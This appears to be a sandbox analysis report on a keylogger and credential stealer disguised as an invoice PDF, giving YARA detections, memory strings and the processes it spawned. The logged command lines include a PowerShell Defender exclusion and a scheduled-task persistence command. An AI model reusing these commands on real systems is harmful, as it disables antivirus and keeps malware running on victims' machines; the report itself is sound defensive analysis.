                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111F36013_2_0111F360
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_011139F013_2_011139F0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_011129EC13_2_011129EC
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111EA9A13_2_0111EA9A
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_01113AA113_2_01113AA1
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_01113E1813_2_01113E18
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_05518BD013_2_05518BD0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_055146B013_2_055146B0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_055192A013_2_055192A0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551DD3713_2_0551DD37
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551DD3813_2_0551DD38
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551DD2813_2_0551DD28
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551E5D913_2_0551E5D9
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551E5E813_2_0551E5E8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551E19013_2_0551E190
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551E18013_2_0551E180
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551004013_2_05510040
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551D47913_2_0551D479
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551000613_2_05510006
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551D03013_2_0551D030
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551D02113_2_0551D021
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551D8D213_2_0551D8D2
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551D8E013_2_0551D8E0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551D48713_2_0551D487
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551D48813_2_0551D488
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_055110B813_2_055110B8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_055110A713_2_055110A7
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551F74813_2_0551F748
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551C31713_2_0551C317
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551F73813_2_0551F738
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551C32813_2_0551C328
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551CBD813_2_0551CBD8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551CBC813_2_0551CBC8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551179813_2_05511798
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551C78013_2_0551C780
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551178813_2_05511788
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551FBA013_2_0551FBA0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551EA4013_2_0551EA40
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551821813_2_05518218
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551EA3013_2_0551EA30
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551822813_2_05518228
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551F2F013_2_0551F2F0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551F2E113_2_0551F2E1
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551EE9813_2_0551EE98
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_05511E8013_2_05511E80
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0551EE8A13_2_0551EE8A
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_055146A013_2_055146A0
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000000.1713581431.000000000042A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeIf.exeR vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1769386708.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1774480735.00000000073F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.000000000282B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeIf.exeR vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4175822593.0000000000937000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeBinary or memory string: OriginalFilenameeIf.exeR vs Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000D.00000002.4175064237.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 7576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: vrhZELiHpiub.exe PID: 7364, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: vrhZELiHpiub.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, JA-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, JA-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, B9CVxTWqZbL9COxYSC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, wvrdGM0ZpKZGfbxjQ7.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, wvrdGM0ZpKZGfbxjQ7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.73f0000.6.raw.unpack, wvrdGM0ZpKZGfbxjQ7.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, wvrdGM0ZpKZGfbxjQ7.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, wvrdGM0ZpKZGfbxjQ7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, wvrdGM0ZpKZGfbxjQ7.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.39db8e0.2.raw.unpack, B9CVxTWqZbL9COxYSC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/11@4/4
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeFile created: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp5F82.tmpJump to behavior
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeFile read: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess created: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess created: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess created: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeSection loaded: msasn1.dllJump to behavior
